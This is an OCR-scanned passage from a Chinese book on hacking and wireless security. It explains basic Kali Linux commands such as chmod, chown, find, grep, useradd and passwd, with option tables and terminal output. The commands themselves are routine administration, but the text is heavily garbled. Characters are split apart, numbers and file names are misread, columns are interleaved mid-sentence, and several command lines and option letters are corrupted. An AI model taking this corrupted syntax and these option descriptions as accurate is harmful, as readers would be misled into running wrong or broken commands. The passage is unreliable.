Footerali: ~/ tenp# dd IT=7deV7ZEerO of=560 11ile COUTE=I bs=560M| 
记录 了 1+6 的 恋 入 
记录 了 1+6 的 写 出 
587202566 bytes (587 MB，569 MiB) copied, 8.11638 s, 72.3 MB/S 


4.4.7 file 


在 Kali Linux 系 统 中 ， 由 于 文本 、 目 
录 、 设 备 等 所 有 这 些 一 切 都 统称 为 文件 ， 
单 凭 后缀 无 法 确定 具体 的 文件 类 型 ， 这 时 
便 可 以 使 用 file 命 令 来 查看 文件 类 型 。 命 令 
语法 格式 如 下 : 
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file [文件 名 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”file 命 令 参数 介绍 
选 项 含 义 
-b 列 出 辨识 结果 时 ， 不 显示 文件 名 称 
< 详细 显示 指令 执行 过 程 ， 便 于 排 错 或 分 析 程序 执行 的 情形 
六 区 定名 炊 文化; 其 内 容 有 一 个 或 多 个 文件 名 称 时 ， 让 file 依 序 辨识 这 些 文件 ， 格 式 为 每 列 
个 文件 名 称 
是 直接 显示 符号 连接 所 指向 的 文件 的 类 别 
-m< 文 件 1: 文件 2> 可 以 是 单个 文件 ， 也 可 以 是 用 冒号 分 开 的 多 个 文件 
vy 显示 版 本 信息 
-z 尝试 去 解读 压缩 文件 的 内 容 
[文件 或 目录 ...] 要 确定 类 型 的 文件 列表 ， 多 个 文件 之 间 使 用 空格 分 开 ， 可 以 使 用 shell 通 配 符 匹 配 多 个 文件 


例如 : 使 用 file 命 令 查看 文件 类 型 ， 下 加 安全 ， 也 可 以 避免 很 多 误 操 作 。 
图 为 命令 执行 效果 。 


| ih hs Test/2# ls 
ddr arpingl.sh arpingz.sh scan.sh scapyl.py scapy2.py| 


4.5.1 chmod 


rt eet ee ASCII text executable Kali Linux/Unix 的 文件 调用 权限 分 为 三 日 噬 
Dee et 下 级 : 文件 拥有 者 、 群 组 、 其 他 。 利 用 chmod 

命令 可 以 修改 文件 的 权限 。 命 令 语法 格式 
4.5 权限 分 配 操作 命令 ah 


chmod [{ugoa}{+-=}{rwx}] [文件 或 目录 ] 
Kali Linux 系 统 对 于 权限 的 分 配 是 非常 [mode=421 ] [文件 或 目录 ] 


严格 的 ， 通 过 不 同 权限 分 配 来 达到 系统 分 命令 中 选项 的 参数 介绍 见 下 表 。 
级 管理 ， 这 样 做 的 目的 不 但 是 为 了 系统 更 
表 chmod 命 令 参数 介绍 


选 项 含 义 
u 表示 该 文件 的 拥有 者 
g 表示 与 该 文件 的 拥有 者 属于 同一 个 群体 (group) 者 
表示 其 他 以 外 的 人 
a 表示 这 三 者 皆 是 
国 | 表示 增加 权限 
- 表示 取消 权限 
本 表示 唯一 设 定 权限 
r 表示 可 读 取 
w 表示 可 写 入 
x 表示 可 执行 
表示 只 有 当 该 文件 是 个 子 目录 或 者 该 文件 已 经 被 设 定 过 为 可 执行 
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续 表 
含 义 
< 若 该 文件 权限 确实 已 经 更 改 ， 才 显示 其 更 改动 作 
f 若 该 文件 权限 无 法 被 更 改 也 不 要 显示 错误 信息 
-Vv 显示 权限 变更 的 详细 资料 
-有 对 目前 目录 下 的 所 有 文件 与 子 目录 进行 相同 的 权限 变更 〈 以 递 回 的 方式 逐个 变更 ) 
--help 显示 辅助 说 明 
--Version 显示 版 本 


尽管 在 Kali Linux 系 统 中 一 切 都 是 文 
件 ， 但 是 每 个 文件 的 类 型 不 尽 相 同 ， 因 此 
Kali Linux 系 统 使 用 了 不 同 的 字符 来 加 以 区 
分 ， 常 见 的 字符 见 下 表 。 


表 常见 的 字符 


普通 文件 
目录 文件 
链接 文件 
块 设备 文件 
字符 设备 文件 
管道 文件 
例如 :使 用 chmod 命 令 修改 文件 权限 ， 
使 文件 具有 可 执行 权限 ， 下 图 为 执行 效果 。 


[ooterat: temp# ls -Ta 
总 用 量 8 


nr-xr-x 2 root root 4996 16 月 39 23:37 
drwxr-xr-x 39 root root 4996 16 月 30 22:48 
-rwxr-xr-x 1 root root 9 16 月 30 22:48 681.txt 
roote@kati:~/temp# chmod 755 991.txt 
root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4996 16 月 38 23:37 
drwxr-xr-x 30 root root 4996 16 月 30 22:48 
-rwxr-xr-xX_ 1 root root 6 16 月 39 22:48 001 tx 


例如 :使 用 chmod 命 令 修改 文件 权限 ， 
取消 可 执行 权限 ， 下 图 为 执行 效果 。 


Foot@kali: /tenp# chmod u-x 61. txt 
oot@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4696 16 月 39 23:37 
rr 30 root root 4096 16 月 36 22:48 
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下 图 为 Kali Linux 中 权限 之 间 的 关系 。 


4.5.2 chown 


Kali Linux/Unix 是 多 人 多 工 操作 系统 
每 个 文件 都 有 所 有 者 ，chown 将 指定 文件 的 
所 有 者 为 指定 的 用 户 或 组 ， 用 户 可 以 是 用 
户 名 或 者 用 户 ID， 可 以 是 组 名 或 者 组 ID 。 
文件 是 以 空格 分 开 的 要 改变 权限 的 文件 列 
表 ， 支 持 通配符 。 

一 般 来 说 ， 这 个 指令 只 有 是 由 系统 管 
理 者 〈root) 所 使 用 ， 一 般 使 用 者 没有 权限 
可 以 改变 别人 的 文件 拥有 者 ， 也 没有 权限 
可 以 自己 的 文件 拥有 者 改 设 为 别人 。 只 有 
系统 管理 者 (root) 才 有 这 样 的 权限 。 命 令 
语法 格式 如 下 : 

[用 户 ] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参数 介绍 

含 义 
新 的 文件 拥有 者 的 使 用 者 ID 


chown 


新 的 文件 拥有 者 的 使 用 者 组 (group) 


显示 更 改 的 部 分 的 信息 


忽略 错误 信息 


修复 符号 链接 
显示 详细 的 处 理 信息 


处 理 指定 目录 以 及 其 子 目 录 下 的 所 有 
训 件 


chown 命 令 的 作用 是 修改 文件 的 所 有 
者 ， 例 如 : 修改 文件 test 001.txt 所 有 者 ， 使 
用 “chown test 001.txt” 命 令 ， 执 行 效果 如 
下 图 所 示 。 


rooTtekalL: /tenp# TS -ta 
总 用 量 8 


drwxr-xr-x 2 root root 4996 16 月 39 23:37 
rwxr-xr-x 30 root root 4996 16 月 38 22:48 

9 16 月 38 22:48 961 .tx 
root@kali:~/temp# chown test 991.txt 
rootekati:-/temp# ls -la 

总 用 量 8 


-rw-r-xr-x 1 root root 


drwxr-xr-x 2 root root 4696 16 月 39 23:37 
drwxr-xr-x 36 root root 4696 16 月 30 22:48 
-rw-r-xr-x 1 test root 9 16 月 36 22:48 B01 .txt 


4.5.3 chgrp 


Kali Linux 系 统 中 的 chgrp 命 令 用 于 变更 
文件 或 目录 的 所 属 群 组 。 在 UNIX 系 统 家 族 
里 ,文件 或 目录 权限 的 掌控 以 所 有 者 及 所 属 
群 组 来 管理 ， 用 户 可 以 使 用 chgrp 指 令 去 变 
更 文件 与 目录 的 所 属 群 组 ， 设 置 方 式 采 用 群 
组 名 称 或 群 组 ID。 命 令 语 法 格式 如 下 : 


chgrp [用户 组 ] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参数 介绍 
选 项 含 义 
ee 效果 类 似 “-v” 选 项 ， 但 仅 回 
报 更 改 的 部 分 
-{ 或 --quiet 或 --silent “| 不 显示 错误 信息 
te Pe ee 只 对 符号 连接 的 文件 做 修改 ， 
而 不 更 动 其 他 任何 相关 文件 


递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目录 一 并 处 理 


-R 或 --Tecursive 


悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


-V 或 --verbose 显示 指令 执行 过 程 
--help 在 线 帮助 
把 指定 文件 或 目录 的 所 属 群 组 
TI “多 和 入 | 全 部 设 成 和 参考 文件 或 目录 的 
所 属 群 组 相同 
--Version 显示 版 本 信息 


chgrp 命 令 同 修改 文件 所 有 者 类 似 ， 


一 个 用 于 修改 用 户 ， 一 个 则 用 于 修改 所 属 
组 ， 例 如 : 使 用 chgrp 修 改 文件 所 属 组 ， 下 
| 4 一 
图 为 执行 效果 。 

root@kali:~/tenmp# ls -la 

总 用 量 8 
drwxr-xr-x 2 root root 4996 19 月 39 23:37 
drwxr-xr-x 39 root root 4996 16 月 30 22:48 
-rw-r-xr-x 1 test root 9 16 月 38 22:48 901.txt 
roote@kati:-/temp# chgrp test 991.txt 
root@kali:~/temp# 15 -la 
总 用 量 
drwxr-xr-x 2 root root 4996 16 月 38 23:37 
drwxr-xr-x 39 root root 4996 16 月 30 22:48 
-rw-r-xr-x 1 test test 9 19 有 36 22:48 901 .txt 


4.5.4 umask 


Kali Linux 系 统 中 的 umask 命 令 指定 在 癌 
建立 文件 时 预 设 的 权限 掩 码 。 umask 可 用 | 
来 设 定 权 限 掩 码 。 权 限 掩 码 是 由 3 个 八进制 
的 数字 所 组 成 ， 将 现 有 的 存 取 权 限 减 掉 权 
限 掩 码 后 ， Wag i 
限 。 命 令 语法 格式 如 下 : Ss 

umask [-S] En 

命令 中 选项 参数 -S， 表 示 以 rwx 形 式 显 
示 新 建文 件 默认 权限 

例如 : 执行 umask 命 令 可 以 查看 默认 权 
限 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# umask | 
69022 

root@kali:~/temp# umask -S 
u=rwx,g=rx,o=rxX 


侈 注意 : 默认 权限 的 计算 方式 为 drwxr- 
XI-X=777-022=755。 


4.6 ”文本 搜索 操作 命令 


随 着 操作 系统 的 使 用 时 间 加 长 ， 系 统 
中 会 存放 大 量 的 文件 信息 ， 如 何 快 速 定位 
到 某 个 文件 这 就 需要 使 用 文件 搜索 指令 。 


4.6.1 find 
Kali Linux 系 统 中 的 fnd 命 令 用 来 在 指定 名 党 


目录 下 查找 文件 ， 任 何 位 于 参数 之 前 的 字 
符 串 都 将 被 视 为 欲 查 找 的 目录 名 。 如 果 使 
用 该 命令 时 ， 不 设置 任何 选项 ， 则 find 命 令 
将 在 当前 目录 下 查找 子 目 录 与 文件 ， 并 且 将 
查找 到 的 子 目录 和 文件 全 部 进行 显示 。 命 令 
语法 格式 如 下 : 


find path 
[ -exec =ok 


-option [ i 1 | 
Bl 


find 命 令 根 据 下 列 规 则 判断 path 和 expres- 
sion， 在 命令 列 上 第 一 个 “-( ),!” 之 前 的 部 
分 为 path， 之 后 的 是 expression。 如 果 path 是 
空 字符 串 则 使 用 目前 路 径 ， 如 果 expression 
是 空 字符 串 则 使 用 -print 为 预 设 expression。 


command ] 


57 


EE 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


表达 式 中 可 使 用 的 选项 有 二 三 十 个 之 多 ， 在 此 只 介绍 最 常用 的 部 分 ， 见 下 表 。 


表 表达 式 中 可 使 用 的 选项 


选 项 含 义 
-mount -xdev 只 检查 和 指定 目录 在 同一 个 文件 系统 下 的 文件 ， 避 免 列 出 其 他 文件 系统 中 的 文件 
-amin n 在 过 去 n 分 钟 内 被 读 取 过 的 的 文件 
-anewer file 比 文件 fle 更 晚 被 读 取 过 的 文件 
-atime n 在 过 去 n 天 内 被 读 取 过 的 文件 
-cminn 在 过 去 n 分 钟 内 被 修改 过 的 文件 
-cnewer file 比 文件 fle 更 新 的 文件 
-ctimen 在 过 去 n 天 内 被 修改 过 的 文件 
-empty 空 的 文件 
-gid n or -group name id 是 n 或 是 group 名 称 是 name 的 文件 


-ipath p, -path p 


-name name, -iname name 


路 径 名 称 符合 p 的 文件 ，ipa 也 会 忽略 大 小 写 
文件 名 称 符合 name 的 文件 。iname 会 忽略 大 小 写 
文件 大 小 是 n 单 位 ，b 代 表 512 位 元 组 的 区 块 ，c 表 示 字 元 数 ，k 表 示 kilo bytes，w 是 二 


搜索 指定 类 型 的 文件 ， 其 中 d 代 表 目 录 文 件 ，c 代 表 字 符 设备 文件 ，b 代 表 快 设备 文 
件 ; p 代 表 管道 文件 ，f 代 表 普 通 文件 ，1 代 表 符 号 链接 文件 ，s 代 表 socket 文 件 用 于 网 


a 个 位 元 组 
-typec 

络 通信 和 链接 的 文件 
-pidn 进程 id 是 "的 文件 


下 面 举 例 说 明 find 命 令 的 使 用 方法 : 

例如 : 使 用 find /etc -name init 命 
令 ， 在 目录 /etc 中 查找 文件 init， 下 图 为 命 
令 执 行 效果 ， 使 用 -iname 不 区 分 大 小 写 。 


root@kali:~/temp# find /etc -name init 

/etc/apparmor/init 

/etc/init 

例如 : 使 用 find / -size +204800 命 令 ， 

在 根 目录 下 查找 大 于 100MB 的 文件 ， 下 图 
为 命令 执行 效果 ， 其 中 +n 大 于 、-n 小 于 、n 
等 于 。 
root@kali: /tenp# Tind / -size +264800 
/proc/kcore 
find: “/proc/1715/task/1715/fd/6': 没有 那个 文件 或 目录 
find: '/proc/1715/task/1715/fdinfo/6': 没有 那个 文件 或 目录 
find: “/proc/1715/fd/5': 没有 那个 文件 或 目录 
find: “/proc/1715/fdinfo/5': 没有 那个 文件 或 目录 


Jsys/devices/pci9999:99/9969:69:6f.6/resourcel 
/sys/devices/pcig999:99/9999:99:9f.9/resourcel_wc 


例如 : 使 用 find /root/temp -user test 
命令 ， 在 /root/temp 目 录 下 查找 所 有 者 为 test 
的 文件 ， 下 图 为 命令 执行 效果 ，-group 根 据 
所 属 组 查找 。 
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root@kali:~/temp# TS -Ta 
8 


drwxr-xr-x 2 root root 4696 16 月 36 23:37 
drwxr-xr-x 36 root root 4696 16 月 36 22:48 
-rw-r-xr-X 1 test test 9 16 月 36 22:48 901.tX1 
root@kali:-/temp# find /root/temp -user test 
/root/temp/991.txt 


例如 : 使 用 find / -cmin -5 命令 ， 在 根 
目录 下 查找 5 分 钟 内 被 修改 过 属性 的 文件 和 
目录 ， 下 图 为 命令 执行 效果 。 

root@kali:~/temp# find / -cmin -5 

/proc/1977/task/1988/fd/34 

/proc/1717/task/1717/fd/6 

/proc/1717/task/1717/fdinfo/6 

/proc/1718 

/proc/1718/task 

/proc/1718/task/1718 

/proc/1718/task/1718/fd 

例如 : 使 用 find /etc -size +1024 -a -size 
-204800 命 令 ， 在 /etc 下 查找 大 于 0.5MB 小 于 
100MB 的 文件 ， 下 图 为 命令 执行 效果 。-a 两 
个 条 件 同时 满足 ，-o 两 个 条 件 满足 任意 一 个 
即 可 。 


第 4 章 


root@kali:~/tenp# find /etc -size +1024 -a -size 
/etc/ssh/moduli 
/etc/netsniff-ng/oui.conf 


例如 : 使 用 find /etc -name inittab -exec 
ls -1 {} \; 命令 ， 在 /etc 下 查找 pam.d 目 录 中 
的 文件 并 显示 其 详细 信息 ， 下 图 为 命令 执 
行 效果 。 


ootEalI /tnpY TInd 7etc -nane Pand exec 5 
140 


-264866 


TUN 


ru-r--r-- 1 roor root 384 9 月 27 2817 chfn 


-- 1 root root 92 3 月 27 2017 chpassvd 

-- 1 root root 581 3 月 27 2617 chsh 

-- 1 roor root 1268 16 月 B 91:92 comnon-account 
1 root root 1221 16 月 8 01:02 connon-auth 

-- 1 root root 1480 16 月 6B 01:02 comnon-password 

-- 1 roor root 1189 16 月 8 91:92 comnon-session 


a 
ke 
mw-r--r 
和 
并 
8 01:02 connon-session-noninteractiva 


1 root root 1154 16 月 


4.6.2 locate 


Kali Linux 系 统 中 的 locate 命 令 用 于 查找 
符合 条 件 的 文档 ， 它 会 去 保存 文档 和 目录 
名 称 的 数据 库 内 ， 查 找 符 合 范 本 样式 条 件 
的 文档 或 目录 ， 一 般 情况 输入 locate your_ 
file_ name 即 可 查找 指定 文件 。 命 令 语法 格 
式 如 下 : 


locate [-d ][--help][--version] [范本 
样式 ...] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 locate 命 令 参数 介绍 
选 项 入 ' 迷 


配置 locate 指 令 使 用 的 数据 库 ， 默 
认 locate 指 令 预 设 的 数据 库 位 于 /var/ 


-d 或 --database= | lib/slocate 目 录 里 ， 文 档 名 为 slocate. 
db， 当 然 也 可 以 使 用 这 个 选项 另行 
指定 

--help 在 线 帮助 

--Version 显示 版 本 信息 


(提示: locate 与 find 不 同 ，find 是 在 硬盘 中 
寻找 ，locate 只 在 /varlib/slocate 资 料 库 中 寻 
找 。locate 的 速度 比 find 快 ， 它 并 不 是 真 的 
查找 ， 而 是 查 数据 库 ， 一 般 文 件数 据 库 在 
/var/lib/slocate/slocate.db 中 ， 所 以 locate 的 查 
找 并 不 是 实时 的 ， 而 是 以 数据 库 的 更 新 为 
准 ， 一 般 是 系统 自己 维护 ， 也 可 以 人 工 升 
级 数据 库 ， 命 令 为 locate -u。 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


例如 : 使 用 locate inittab 命 令 ， 查 找 init- 
tab 字 段 的 文件 ， 下 图 为 命令 执行 效果 。 
Iroot@kali:~/temp# locate inittab | 


/usr/share/terminfo/a/ansi+inittabs 
/usr/share/vim/vim81/syntax/inittab.vim 


4.6.3 which 


Kali Linux 系 统 中 的 which 命 令 用 于 查 拷 
找 文 件 ，which 指 令 会 在 环境 变量 $8PATH 
设置 的 目录 里 查找 符合 条 件 的 文件 。 命 令 
语法 格式 如 下 : 

ben [ 文 休 =--] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参 数 介绍 
各 议 合 ” 淡 
指定 文件 名 长 度 ， 指 定 的 长 度 必 
-n< 文 件 名 长 度 > | 须 大 于 或 等 于 所 有 文件 中 最 长 的 
文件 名 
ed 指定 输出 时 栏 位 的 宽度 
a 显示 版 本 信息 


例如 : 使 用 which 命 令 搜索 命令 所 在 
路 径 ， 执 行 which ls 命令 ， 下 图 为 命令 执行 
效果 。 


root@kali:~/temp# which 可 
/usr/bin/ls 


4.6.4 whereis 


Kali Linux 系 统 中 的 whereis 命 令 用 于 查 日 久 
找 文 件 。 该 指令 会 在 特定 目录 中 查找 符合 
条 件 的 文件 。 这 些 文件 应 属于 原始 代码 、 
二 进 制 文件 ， 或 是 帮助 文件 。 不 过 ， 该 指 
令 只 能 用 于 查找 二 进 制 文件 、 源 代码 文 
件 和 man 手 册页， 一 般 文件 的 定位 需 使 用 
locate 命 令 。 命 令 语 法 格式 如 下 : 


whereis [-bfmsu] [-B < 目录 >...][-M < 目 
eS SHR 


命令 中 选项 的 参数 介绍 见 下 表 。 
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只 查找 二 进 制 文件 


表 whereis 命 令 参数 介绍 
鲍 义 


4.6.5 grep 


Kali Linux 系 统 中 的 grep 命 令 用 于 查 
找 文件 里 符合 条 件 的 字符 串 ， 其 查找 的 内 


只 在 设置 的 目录 下 查找 二 进 制 文件 


容 包含 指定 的 范本 样式 文件 ， 如 果 发 现 某 


不 显示 文件 名 前 的 路 径 名 称 
i 只 查找 说 明文 件 文件 的 内 容 符 合 所 指定 的 范本 样式 ， 预 设 
-M< 目 录 > | 只 在 设置 的 目录 下 查找 说 明文 件 grep 指 令 会 把 含有 范本 样式 的 那 一 列 显示 出 
-s 只 查找 原始 代码 文件 来 。 若 不 指定 任何 文件 名 称 ， 或 是 所 给 予 
-S< 目 录 > ”| 只 在 设置 的 目录 下 查找 原始 代码 文件 的 文件 名 为 “-”， 则 grep 指 令 会 从 标准 输 


-lh 查找 不 包含 指定 类 型 的 文件 


例如 : 使 用 whereis 命 令 搜 索 命令 及 帮 
助 文档 所 在 路 径 ， 执 行 whereis ls 命令 ， 下 


图 为 命令 执行 效果 。 


人 /temp# whereis TS 


s: /usr/bin/ls /usr/share/man/manl/ls.1.g9z 


选 项 
-a 或 --text 
-A< 显 示 行 数 > 或 --after-context=< 显 示 
行 数 > 
-b 或 --byte-offset 
-B< 显 示 行 数 > 或 --before-context=< 显 
示 行 数 > 
-或 --count 


-C< 显 示 行 数 > 或 --context=< 显 示 行 数 
> 或 -< 显示 行 数 > 


-d < 动作 > 或 --directories=< 动 作 > 


-e< 范 本 样式 > 或 -regexp=< 范 本 样式 > 


入 设备 读 取 数据 。 命 令 语 法 格式 如 下 : 

grep [-abcEFGhHilLnqrsvVwxy][-A< 显 示 
列 数 >] [-B< 显 示 列 数 >] [-C< 显 示 列 数 >] [-d< 进 行动 
作 >] [-e< 范 本 样式 >] [-f< 范 本 文件 >] [--help] [ 范 
本 样式 ] [文件 或 目录 ...] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 ”grep 命 令 参数 介绍 
含义 

不 要 忽略 二 进 制 的 数据 
除了 显示 符合 范本 样式 的 那 一 列 之 外 ， 并 显示 该 行 之 后 的 内 容 
在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 第 一 个 字符 的 编号 
除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 的 内 容 
计算 符合 样式 的 列 数 
除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 后 的 内 容 


当 指定 要 查找 的 是 目录 而 非 文件 时 ， 必 须 使 用 这 项 参数 ， 否 则 grep 指 令 将 
回报 信息 并 停止 动作 


指定 字符 串 作为 查找 文件 内 容 的 样式 


-EE 或 --extended-regexp 


将 样式 为 延伸 的 普通 表示 法 来 使 用 


-f< 规 则 文件 > 或 -fle=< 规 则 文件 > 


指定 规则 文件 ， 其 内 容 含 有 一 个 或 多 个 规则 样式 ， 让 grep 查 找 符合 规则 条 
件 的 文件 内 容 ， 格 式 为 每 行 一 个 规则 样式 


-或 --fixed-regexp 
-G 或 --basic-regexp 


将 样式 视 为 固定 字符 串 的 列表 
将 样式 视 为 普通 的 表示 法 来 使 用 


二 或 --no-filename 


在 显示 符合 样式 的 那 一 行 之 前 ， 不 标示 该 行 所 属 的 文件 名 称 


-也 或 --with-filename 


在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 该 行 所 属 的 文件 名 称 


-i 或 --ignore-case 


忽略 字符 大 小 写 的 差别 


-1 或 --file-with-matches 


列 出 文件 内 容 符合 指定 的 样式 的 文件 名 称 


工 或 --files-without-match 


列 出 文件 内 容 不 符合 指定 的 样式 的 文件 名 称 


-0 或--line-number 
-q 或 --quiet 或 --silent 


在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 的 列 数 编号 
不 显示 任何 信息 
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续 表 
选 项 含 义 
工 或 --recursive 此 参数 的 效果 和 指定 “-d recurse” 参 数 相同 
-S 或 -no-messages 不 显示 错误 信息 
-V 或 --revert-match 显示 不 包含 匹配 文本 的 所 有 行 
-V 或 --version 显示 版 本 信息 
-W 或 --word-regexp 只 显示 全 字符 合 的 列 
-x --line-regexp 只 显示 全 列 符合 的 列 
-y 此 参数 的 效果 和 指定 “-i” 参 数 相同 


例如 : 使 用 grep 命 令 筛选 出 符合 条 件 
的 文本 内 容 ， 执 行 grep asp /etc/services 命 
令 ， 下 图 为 命令 执行 效果 。 


Fata ton grep 056 7eEC756TVIC65 
27374/tcp 


# Address Search ProtocoU 
Basp 27374/udp 


4.6.6 man 

man 命 令 是 Kali Linux 系 统 中 的 帮助 指 
令 ， 通 过 man 指 令 可 以 查看 Kali Linux 中 的 
pe 配置 文件 帮助 和 编程 帮助 等 信 
息 。 命 令 语 法 格式 如 下 : 
[命令 或 配置 文件 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 

表 grep 命 令 参数 介绍 


man 


在 所 有 的 man 帮 助手 册 中 搜索 


等 价 于 whatis 指 令 ， 显 示 给 定 关 键 字 的 简 
短 描述 信息 


Pp | 指定 内 容 时 使 用 分 页 程序 


-M 指定 man 手 册 搜 索 的 路 径 


例如 : 使 用 man 命 令 ， 查 看 ls 的 帮助 信 
息 ， 下 图 为 命令 执行 效果 。 


CST 


User Commands [gy 


NANE 
1s ~ Ust directory contents 


SYNoPSIS 
Ls [DETIDN]... [ELLE]... 
DESCRIPTION 
List informar: tthe TtEs CU 
SOrt en 


ou nt drectory by dete 
slphabe enny ir 要 


st 


or spec 
fied, 

Mandatory Brguments to long options are mandatory for short options 
too. 


-a，--aLL 
dp not ignore entries starting with . 


-AR，--atmost-alti 
not Ut tmuded . and .. 


-author 


4.6.7 help 


help 为 内 置 指令 帮助 命令 ， 多 数 指令 训 
都 提供 了 内 置 的 帮助 手册 ， 如 果 忘记 某 个 
指令 的 操作 方法 ， 可 以 使 用 help 查 看 帮助 信 
息 。 命 令 语法 如 下 : 

help 命令 


例如 : 使 用 help umask 命 令 ， 查 看 
umask 的 帮助 信息 ， 下 图 为 命令 执行 效果 。 


FooTORaLI /tenp# nelp unask 
bmask: umask [-p] [-S] [模式 ] 
显示 或 设 定 文件 模式 掩 码 。 


设 定 用 户 文件 创建 掩 码 为 MODE 模式 。 如 果 省 略 了 MODE， 则 
打印 当前 掩 码 的 值 。 


如 果 MODE 模式 以 数字 开头 ， shi 否则 是 一 
chmod(1) 可 接收 的 符号 模式 串 


如 果 省 略 MODE 模式 ， 以 可 重用 为 输入 的 格式 输入 
以 符号 形式 输出 ， 否 则 以 八进制 数 格式 输出 


,除非 使 用 了 无 效 的 _MODE 模式 或 者 选项 。 


4.7 用户 账户 操作 命令 


任何 操作 系统 都 需要 人 来 使 用 ， 如 
何 创 建 并 管理 账户 ， 便 是 本 节 要 学 习 的 
内 容 。 


4.7.1 


Kali Linux 系 统 中 的 useradd 命 令 用 于 建 
立 用 户 账号 。 账 号 建 好 之 后 ， 再 用 passwd 
设 定 账号 的 密码 ， 还 可 用 userdel 删 除 账 
号 ， 使 用 useradd 指 令 所 建立 的 账号 ， 实 际 
上 是 保存 在 /etc/passwd 文 本 文件 中 。 命 令 
语法 格式 如 下 : 


useradd 
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useradd [-mMnr] [-c < 备注 >] [-d < 登入 目录 >] [-e < 有 效 期 限 >] [-f < 缓冲 天 数 >] [-g < 群 组 >] 
[-G < 群 组 >] [-s <shel1>][-u <uid>][ 用 户 帐号 ] 


或 
useradd -D [-b] [-e < 有 效 期 限 >] [-f < 缓冲 天 数 >] [-g < 群 组 >] [-G < 群 组 >] [-s <shel1>] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 useradd 命 令 参数 介绍 
选 项 含 义 
-C< 备 注 > 加 上 备注 文字 。 备 注 文字 会 保存 在 passwd 的 备注 栏 位 中 
-d< 登 录 目 录 > 指定 用 户 登 录 时 的 起 始 目录 
车 变更 预 设 值 
-e< 有 效 期 限 > 指定 账号 的 有 效 期 限 
-人 < 缓冲 天 数 > 指定 在 密码 过 期 后 多 少 天 即 关闭 该 账号 
-g< 群 组 > 指定 用 户 所 属 的 群 组 
-G< 群 组 > 指定 用 户 所 属 的 附加 群 组 
-m 自动 建立 用 户 的 登录 目录 
-M 不 要 自动 建立 用 户 的 登录 目录 
1 取消 建立 以 用 户 名 称 为 名 的 群 组 
I 建立 系统 账号 
-s<shell> 指定 用 户 登录 后 所 使 用 的 shell 
-u<uid> 指定 用 户 ID 
例如 : 使 用 useradd test 命 令 可 以 增加 一 或 
个 新 用 户 ， 执行 命令 如 下 : adduser -D [-g default group] [-b 
| 
侈 提示 : 新 用 户 增加 成 功 后 无 任何 提示 ， 命令 中 选项 的 参数 介绍 见 下 表 。 
新 用 户 需要 使 用 passwd 命 令 设置 账号 密 表 adduser 命 令 参数 介绍 
ee 选 项 含义 
站 二 rt me (通常 是 /etc/ 


Kali Linux 系 统 中 的 adduser 命 令 用 于 创 
建 用 户 账号 或 更 新 现 有 账号 资料 ，adduser -dhome di 
与 useradd 指 令 为 同一 指令 ， 该 命令 的 使 用 


设 定 使 用 者 的 家 目录 为 home_dir， 预 
设 值 为 预 设 的 home 后 面 加 上 使 用 者 账 
号 loginid 


为 系统 管理 员 。 语 》 设 定 此 账号 的 使 用 期 限 〈 格 式 为 
权限 为 系统 管理 员 。 命 令 语法 格式 如 下 -eexpire_date -MM_DD) ， 预 设 值 为 永久 有 效 
adduser [-c comment] [-d home dir] 
[-e expire date] [-f inactive time] [-g 例如 : 使 用 adduser test2 命 令 ， 创建 一 
i growp] [6 growp[ sa [Ww [XK 个 账号 账号 创建 过 程 中 会 提示 设置 密码 ， 
skeleton ar (| ~M] I[=p passwdl] II=3 


3 | 还 有 一 些 基本 信息 ， 下 图 为 执行 效果 。 
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oot@kali:~/temp# adduser 
dduser : 只 允许 一 个 或 者 两 个 名 字 。 
oot@kali:~/temp# adduser test2 
在 添加 用 户 "test2" 
在 添加 新 组 "test2" (1991) . 
在 添加 新 用 户 "test2” (1691) 到 组 "test2" 
j 建 主 目录 "/home/test2" 
在 从 */etc/sket" 复 制 文件 .. . 
答 入 新 的 UNIX 密码 : 
新 输入 新 的 UNIX 密码 : 
asswd : 已 成 功 更 新 密码 
在 改变 test2 的 用 户 信 息 
输入 新 值 ， 或 直接 敲 回 车 键 以 使 用 默认 值 
全 名 []: 
房间 号 码 []: 
工作 电话 []: 
家 庭 电话 []: 


其 他 []: 
些 信 息 是 否 正 确 ? [Y/n] y 


4.7.3 passwd 


Kali Linux 系 统 中 的 passwd 命 令 用 来 修 
改 账号 密码 ， 如 果 使 用 useradd 创 建 的 账户 
默认 是 没有 设置 密码 的 ， 可 以 通过 该 指令 
进行 设置 。 命 令 语法 格式 如 下 : 

passwd [-k] [-1] [-u [-f]] [-d] [-S] 
[username] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 passwd 命 令 参 数 介绍 
选 项 含 义 
-d 删除 密码 
f 强制 执行 
k 更 新 只 能 发 送 在 过 期 之 后 
-1 停止 账号 使 用 
-S 显示 密码 信息 
Ei 启用 已 被 停止 的 账户 
习 设置 密码 的 有 效 期 
-8 修改 群 组 密码 
-i 过 期 后 停止 用 户 账号 


例如 : 使 用 passwd 命 令 修 改 账号 密 


码 ， 下 图 为 命令 执行 效果 。 
Iroot@kali:~/temp# passwd test 
输入 新 的 UNIX 密码 : 
重新 输入 新 的 UNIX 密码 : 
passwd : 已 成 功 更 新 密码 | 


4.7.4 userdel 


userdel 可 删除 用 户 账 号 与 相关 的 文 
